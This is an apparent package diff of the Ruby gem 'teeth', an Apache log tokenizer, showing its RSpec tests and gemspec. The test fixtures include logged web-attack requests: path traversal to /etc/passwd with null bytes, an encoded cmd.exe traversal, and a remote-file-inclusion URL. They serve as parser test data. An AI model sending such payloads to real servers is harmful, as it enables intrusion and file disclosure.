danielsdeleo-teeth 0.0.2

Sign up to get free protection for your applications and to get access to all the features.
data/lib/teeth.rb ADDED
@@ -0,0 +1 @@
1
+ require "teeth/tokenize_apache_logs"
data/spec/spec.opts ADDED
@@ -0,0 +1 @@
1
+ -c
data/spec/spec_helper.rb ADDED
@@ -0,0 +1,10 @@
1
+ require 'teeth/tokenize_apache_logs'
2
+
3
# Spec helper: builds a custom matcher that passes when the value under test
# is greater than `expected` (compared with `>`).
#
# expected - the lower bound the actual value must exceed.
#
# Returns whatever `simple_matcher` returns. `simple_matcher` is not defined in
# this listing -- presumably the RSpec 1.x helper; TODO confirm.
# NOTE(review): no example in this listing calls be_greater_than.
+ def be_greater_than(expected)
# The first argument is the matcher's description; the block receives the
# actual value (`given`) and the matcher object being configured.
4
+ simple_matcher("be greater than #{expected.to_s}") do |given, matcher|
5
+ matcher.failure_message = "expected #{given.to_s} to be greater than #{expected.to_s}"
6
+ matcher.negative_failure_message = "expected #{given.to_s} to not be greater than #{expected.to_s}"
# The block's last expression is the comparison result itself.
7
+ given > expected
8
+ end
9
+
10
+ end
data/spec/unit/tokenize_apache_spec.rb ADDED
@@ -0,0 +1,106 @@
1
+ require File.dirname(__FILE__) + '/../spec_helper'
2
# Sets a process-wide global flag to true. Nothing in this listing reads it;
# presumably it is consulted elsewhere to opt in to slow examples -- TODO confirm.
+ $INCLUDE_SLOW_TESTS = true
3
+
4
# Examples for String#tokenize_apache_logs applied to an Apache error-log line.
# The method itself is not defined in this listing; presumably it comes from
# the 'teeth/tokenize_apache_logs' extension required by the spec helper --
# TODO confirm. Results are indexed by symbol keys, and most expectations call
# `.first` on the value stored under a key.
+ describe "Apache Lexer Extension", "when lexing apache errors" do
5
+
# Re-tokenizes the same sample error line before every example and keeps the
# result in @tokens.
6
+ before(:each) do
7
+ str = "[Sun Nov 30 14:23:45 2008] [error] [client 10.0.1.197] Invalid URI in request GET .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/winnt/win.ini HTTP/1.1"
8
+ @tokens = str.tokenize_apache_logs
9
+ end
10
+
# Empty input still yields a :message and an :id entry.
# NOTE(review): the :id pattern is unanchored, so it passes for any value that
# merely contains 32 consecutive uppercase hex characters.
11
+ it "should return an uuid and empty message for an empty string" do
12
+ tokens = "".tokenize_apache_logs
13
+ tokens[:message].should == ""
14
+ tokens[:id].should match(/[0-9A-F]{32}/)
15
+ end
16
+
17
+ it "should extract an IP address" do
18
+ @tokens[:ipv4_addr].first.should == "10.0.1.197"
19
+ end
20
+
# The expected datetime is the bracketed timestamp without its brackets.
21
+ it "should extract an apache datetime" do
22
+ @tokens[:apache_err_datetime].first.should == "Sun Nov 30 14:23:45 2008"
23
+ end
24
+
25
+ it "should extract the error level" do
26
+ @tokens[:error_level].first.should == "error"
27
+ end
28
+
# The backslash-laden request path from the sample line is expected back
# verbatim under :relative_url.
29
+ it "should extract the URI" do
30
+ @tokens[:relative_url].first.should == ".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/winnt/win.ini"
31
+ end
32
+
# The input is 10 * 1000 * 100 = 1,000,000 characters plus one trailing "X",
# i.e. exactly one character over the limit named in the expected error message.
33
+ it "should error out if the string is longer than 1M chars" do
34
+ str = ((("abcDE" * 2) * 1000) * 100) + "X"
35
+ lambda {str.tokenize_apache_logs[:word]}.should raise_error(ArgumentError, "string too long for tokenize_apache_logs! max length is 1,000,000 chars")
36
+ end
37
+
38
+ end
39
+
40
# Examples for String#tokenize_apache_logs applied to Apache access-log lines.
# The method itself is not defined in this listing; presumably it comes from
# the 'teeth/tokenize_apache_logs' extension -- TODO confirm.
+ describe "Apache Lexer Extension", "when lexing apache access logs" do
# Tokenizes seven sample lines before every example:
#   @tokens           - the only sample with a vhost prefix, referer and user agent
#   @tokens2          - request URL that embeds a second http:// URL and ends in "??"
#   @tokens3          - status 206 with a byte count (255404) that ends in "404"
#   @tokens4          - request with no protocol version after the URL
#   @tokens5/@tokens6 - directory-traversal query strings ending in %00
#   @tokens_naked_url - request for "/" only
41
+ before(:each) do
42
+ str = %q{couchdb.localdomain:80 172.16.115.1 - - [13/Dec/2008:19:26:11 -0500] "GET /favicon.ico HTTP/1.1" 404 241 "http://172.16.115.130/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"}
43
+ @tokens = str.tokenize_apache_logs
44
+ str2 = %q{127.162.219.29 - - [14/Jan/2009:15:32:32 -0500] "GET /reports//ee_commerce/paypalcart.php?toroot=http://www.shenlishi.com//skin/fxid1.txt?? HTTP/1.1" 404 5636}
45
+ @tokens2 = str2.tokenize_apache_logs
46
+ str3 = %q{127.81.248.53 - - [14/Jan/2009:11:49:43 -0500] "GET /reports/REPORT7_1ART02.pdf HTTP/1.1" 206 255404}
47
+ @tokens3 = str3.tokenize_apache_logs
48
+ str4 = %q{127.140.136.56 - - [23/Jan/2009:12:59:24 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 5607}
49
+ @tokens4 = str4.tokenize_apache_logs
50
+ str5 = %q{127.254.43.205 - - [26/Jan/2009:08:32:08 -0500] "GET /reports/REPORT9_3.pdf//admin/includes/footer.php?admin_template_default=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5673}
51
+ @tokens5 = str5.tokenize_apache_logs
52
+ str6 = %q{127.218.234.82 - - [26/Jan/2009:08:32:19 -0500] "GET /reports/REPORT9_3.pdf//admin/includes/header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5721}
53
+ @tokens6 = str6.tokenize_apache_logs
54
+ str_naked_url = %q{127.218.234.82 - - [26/Jan/2009:08:32:19 -0500] "GET / HTTP/1.1" 404 5721}
55
+ @tokens_naked_url = str_naked_url.tokenize_apache_logs
56
+ end
57
+
# NOTE(review): this example has no expectations; its only statement is a
# commented-out debugging print.
58
+ it "provides hints for testing" do
59
+ #puts "\n" + @tokens.inspect + "\n"
60
+ end
61
+
# The expected :host value includes the ":80" port suffix.
62
+ it "should extract the vhost name" do
63
+ @tokens[:host].first.should == "couchdb.localdomain:80"
64
+ end
65
+
# The expected datetime is the bracketed timestamp without its brackets.
66
+ it "should extract the datetime" do
67
+ @tokens[:apache_access_datetime].first.should == "13/Dec/2008:19:26:11 -0500"
68
+ end
69
+
# Besides the sample line, every status code listed in the commented pattern
# below (100, 101, 200-206, 300-305, 307, 400-417, 500-505) is tokenized as a
# bare string and must come back as the first :http_response entry.
70
+ it "should extract the HTTP response code" do
71
+ @tokens[:http_response].first.should == "404"
72
+ #(100|101|20[0-6]|30[0-5]|307|40[0-9]|41[0-7]|50[0-5])
73
+ codes = ['100', '101'] + (200 .. 206).map { |n| n.to_s } +
74
+ (300 .. 305).map { |n| n.to_s } + ['307'] + (400 .. 417).map { |n| n.to_s } +
75
+ (500 .. 505).map { |n| n.to_s }
76
+ codes.each do |code|
77
+ code.tokenize_apache_logs[:http_response].first.should == code
78
+ end
79
+ end
80
+
81
+ it "should extract the HTTP version" do
82
+ @tokens[:http_version].first.should == "HTTP/1.1"
83
+ end
84
+
85
+ it "should extract the browser string with quotes removed" do
86
+ @tokens[:browser_string].first.should == "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
87
+ end
88
+
# Uses @tokens3, whose byte count 255404 ends in "404" while the real status is
# 206; "404" must not show up among the :http_response values.
89
+ it "should not extract an HTTP code when a HTTP response code number appears in the bytes transferred" do
90
+ #puts "\nTOKENS3:\n" + @tokens3.inspect
91
+ @tokens3[:http_response].include?("404").should_not be_true
92
+ end
93
+
# Each attack-style request URL is expected back verbatim as the first
# :relative_url entry.
94
+ it "should correctly identify gnarly URLs from web attacks as URLs" do
95
+ #puts "\nTOKENS2:\n" + @tokens2.inspect
96
+ @tokens2[:relative_url].first.should == "/reports//ee_commerce/paypalcart.php?toroot=http://www.shenlishi.com//skin/fxid1.txt??"
97
+ @tokens4[:relative_url].first.should == "/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"
98
+ @tokens5[:relative_url].first.should == "/reports/REPORT9_3.pdf//admin/includes/footer.php?admin_template_default=../../../../../../../../../../../../../etc/passwd%00"
99
+ @tokens6[:relative_url].first.should == "/reports/REPORT9_3.pdf//admin/includes/header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00"
100
+ end
101
+
# Unlike the examples above, this one compares the whole :relative_url value,
# so "/" must be the only entry.
102
+ it "should correctly extract ``/'' as a URL" do
103
+ @tokens_naked_url[:relative_url].should == ["/"]
104
+ end
105
+
106
+ end
metadata ADDED
@@ -0,0 +1,67 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: danielsdeleo-teeth
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.2
5
+ platform: ruby
6
+ authors:
7
+ - Daniel DeLeo
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+
12
+ date: 2009-03-21 00:00:00 -07:00
13
+ default_executable:
14
+ dependencies: []
15
+
16
+ description: Fast log file parsing in Ruby
17
+ email: ddeleo@basecommander.net
18
+ executables: []
19
+
20
+ extensions:
21
+ - ext/extconf.rb
22
+ extra_rdoc_files:
23
+ - README.rdoc
24
+ files:
25
+ - README.rdoc
26
+ - Rakefile
27
+ - ext/extconf.rb
28
+ - ext/tokenize_apache_logs.yy
29
+ - ext/tokenize_apache_logs.yy.c
30
+ - lib/teeth.rb
31
+ - spec/fixtures/access.log
32
+ - spec/fixtures/big-access.log
33
+ - spec/fixtures/big-error.log
34
+ - spec/fixtures/error.log
35
+ - spec/fixtures/med-error.log
36
+ - spec/spec.opts
37
+ - spec/spec_helper.rb
38
+ - spec/unit/tokenize_apache_spec.rb
39
+ has_rdoc: true
40
+ homepage: http://github.com/danielsdeleo/teeth
41
+ post_install_message:
42
+ rdoc_options:
43
+ - --inline-source
44
+ - --charset=UTF-8
45
+ require_paths:
46
+ - - lib
47
+ required_ruby_version: !ruby/object:Gem::Requirement
48
+ requirements:
49
+ - - <=
50
+ - !ruby/object:Gem::Version
51
+ version: 1.9.0
52
+ version:
53
+ required_rubygems_version: !ruby/object:Gem::Requirement
54
+ requirements:
55
+ - - ">="
56
+ - !ruby/object:Gem::Version
57
+ version: "0"
58
+ version:
59
+ requirements: []
60
+
61
+ rubyforge_project: bloomfilter
62
+ rubygems_version: 1.2.0
63
+ signing_key:
64
+ specification_version: 2
65
+ summary: Fast log file parsing in Ruby
66
+ test_files: []
67
+